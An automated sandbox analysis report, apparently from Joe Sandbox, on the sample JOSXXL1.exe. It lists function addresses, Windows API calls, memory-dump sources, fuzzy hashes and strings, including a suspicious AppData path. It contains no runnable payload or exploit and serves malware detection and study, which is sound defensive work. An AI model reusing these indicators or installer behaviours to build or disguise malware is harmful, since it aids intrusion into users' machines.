                                                                                                        • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                        • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                        Function 0040427C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        • Opcode ID: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
                                                                                                        • Instruction ID: 7863800e542b6cbc8ec812c2a21dbba0b6cde8a84852b126545aa60b8f7f929b
                                                                                                        • Opcode Fuzzy Hash: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
                                                                                                        • Instruction Fuzzy Hash: 13B01235285A00FBDE214B00EE09F457E62F76CB01F008478B340240F0CAB300B1DF19
                                                                                                        Function 00404269 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00404041), ref: 00404273
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 2492992576-0
                                                                                                        • Opcode ID: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
                                                                                                        • Instruction ID: 08295bde0fd8e02eb16c20732bdcb1eb6333efd9321479dd2e2322931d05c33c
                                                                                                        • Opcode Fuzzy Hash: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
                                                                                                        • Instruction Fuzzy Hash: ADA001B6644500ABCE129F90EF49D0ABB72EBE4B02B518579A285900348A365961FB59
                                                                                                        Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 3472027048-0
                                                                                                        • Opcode ID: 6ae527e6cc94f5f5e8d5a49a66ee65cacad6fe88e42295e5ff3276528536477d
                                                                                                        • Instruction ID: 754004f40eea7f16e1f379b15ffb2f72bdee5afc6285ec4f51c34af4300ec48c
                                                                                                        • Opcode Fuzzy Hash: 6ae527e6cc94f5f5e8d5a49a66ee65cacad6fe88e42295e5ff3276528536477d
                                                                                                        • Instruction Fuzzy Hash: 2DD01277B14100DBD720EFB9BF89C6F73A8EB513293204837D942E11A2D57DD852862D

                                                                                                        Non-executed Functions

                                                                                                        Function 00404C5E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404C76
                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404C81
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCB
                                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404CDE
                                                                                                        • SetWindowLongW.USER32(?,000000FC,00405256), ref: 00404CF7
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0B
                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D1D
                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404D33
                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3F
                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D51
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00404D54
                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7F
                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8B
                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E21
                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E4C
                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E60
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404E8F
                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E9D
                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404EAE
                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAB
                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405010
                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405025
                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405049
                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405069
                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 0040507E
                                                                                                        • GlobalFree.KERNEL32(?), ref: 0040508E
                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405107
                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 004051B0
                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BF
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004051DF
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 0040522D
                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405238
                                                                                                        • ShowWindow.USER32(00000000), ref: 0040523F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                        • String ID: $M$N
                                                                                                        • API String ID: 1638840714-813528018
                                                                                                        • Opcode ID: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
                                                                                                        • Instruction ID: 46f3c2dfcfe7d78df06ebec09318e15d32e2b04993d9507e8b01d99ed80ca2ca
                                                                                                        • Opcode Fuzzy Hash: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
                                                                                                        • Instruction Fuzzy Hash: CA026EB0A00209AFDF209F65DD45AAE7BB5FB44314F10817AF610BA2E1C7799E52CF58
                                                                                                        Function 004046E2 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404731
                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0040475B
                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040480C
                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404817
                                                                                                        • lstrcmpiW.KERNEL32(Call,00423748,00000000,?,?), ref: 00404849
                                                                                                        • lstrcatW.KERNEL32(?,Call), ref: 00404855
                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404867
                                                                                                          • Part of subcall function 004058AC: GetDlgItemTextW.USER32(?,?,00000400,0040489E), ref: 004058BF
                                                                                                          • Part of subcall function 00406417: CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\JOSXXL1.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040647A
                                                                                                          • Part of subcall function 00406417: CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
                                                                                                          • Part of subcall function 00406417: CharNextW.USER32(0040A230,"C:\Users\user\Desktop\JOSXXL1.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040648E
                                                                                                          • Part of subcall function 00406417: CharPrevW.USER32(0040A230,0040A230,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 004064A1
                                                                                                        • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 0040492A
                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404945
                                                                                                          • Part of subcall function 00404A9E: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
                                                                                                          • Part of subcall function 00404A9E: wsprintfW.USER32 ref: 00404B48
                                                                                                          • Part of subcall function 00404A9E: SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                        • String ID: A$C:\Users\user\AppData\Local\indvandrings\attraavrdig$Call$H7B$\d
                                                                                                        • API String ID: 2624150263-3848520769
                                                                                                        • Opcode ID: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
                                                                                                        • Instruction ID: 9c6f5067bad78934a321292c7affeb857c6c8b78ef178650078e6910c23b8850
                                                                                                        • Opcode Fuzzy Hash: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
                                                                                                        • Instruction Fuzzy Hash: D8A183F1A00208ABDF11AFA5CD45AAFB7B8EF84314F10843BF611B62D1D77C99418B69
                                                                                                        Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                                                                        • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                        • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                        • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                        • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                        • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2337832913.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2337963642.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2338036438.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$Free$lstrcpy$Alloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 4227406936-0
                                                                                                        • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                        • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                        • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                        • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                                        Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CoCreateInstance.OLE32(0040849C,?,00000001,0040848C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\indvandrings\attraavrdig, xrefs: 00402154
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateInstance
                                                                                                        • String ID: C:\Users\user\AppData\Local\indvandrings\attraavrdig
                                                                                                        • API String ID: 542301482-3036879226
                                                                                                        • Opcode ID: cf94c7b7cb7f03cb1db79e66d9edf1813590421b21ba1cbe0db7abe7f4c0e10f
                                                                                                        • Instruction ID: 385f74efd5c92971cc76d3b11bce30356dc3a3525802f9592d77ec9fc6b050a7
                                                                                                        • Opcode Fuzzy Hash: cf94c7b7cb7f03cb1db79e66d9edf1813590421b21ba1cbe0db7abe7f4c0e10f
                                                                                                        • Instruction Fuzzy Hash: E5412C75A00209AFCF00DFA4CD88AAD7BB5FF48314B20457AF915EB2D1DBB99A41CB54
                                                                                                        Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileFindFirst
                                                                                                        • String ID:
                                                                                                        • API String ID: 1974802433-0
                                                                                                        • Opcode ID: ff5730ae288ebb4c2c7f72d00f03721da9664918cf6f8891babb7f0252882a05
                                                                                                        • Instruction ID: f51a3655aa6281515c31db2bfa725e220f35cee11171475ca2a169fd8dd427bf
                                                                                                        • Opcode Fuzzy Hash: ff5730ae288ebb4c2c7f72d00f03721da9664918cf6f8891babb7f0252882a05
                                                                                                        • Instruction Fuzzy Hash: 09F05E716001149BC711EBA4DE49AAEB374EF04324F10057BE515E31E1D6B499459B2A
                                                                                                        Function 004043E4 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 207windowstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404482
                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404496
                                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044B3
                                                                                                        • GetSysColor.USER32(?), ref: 004044C4
                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044D2
                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044E0
                                                                                                        • lstrlenW.KERNEL32(?), ref: 004044E5
                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044F2
                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404507
                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404560
                                                                                                        • SendMessageW.USER32(00000000), ref: 00404567
                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404592
                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D5
                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004045E3
                                                                                                        • SetCursor.USER32(00000000), ref: 004045E6
                                                                                                        • ShellExecuteW.SHELL32(0000070B,open,00428200,00000000,00000000,00000001), ref: 004045FB
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00404607
                                                                                                        • SetCursor.USER32(00000000), ref: 0040460A
                                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404639
                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                        • String ID: Call$N$[C@$\d$open
                                                                                                        • API String ID: 3615053054-3784353869
                                                                                                        • Opcode ID: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
                                                                                                        • Instruction ID: 197425fdc48522821a3d1a28f7e64f0f4dcf149373df3ed1280bb5b235060fa2
                                                                                                        • Opcode Fuzzy Hash: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
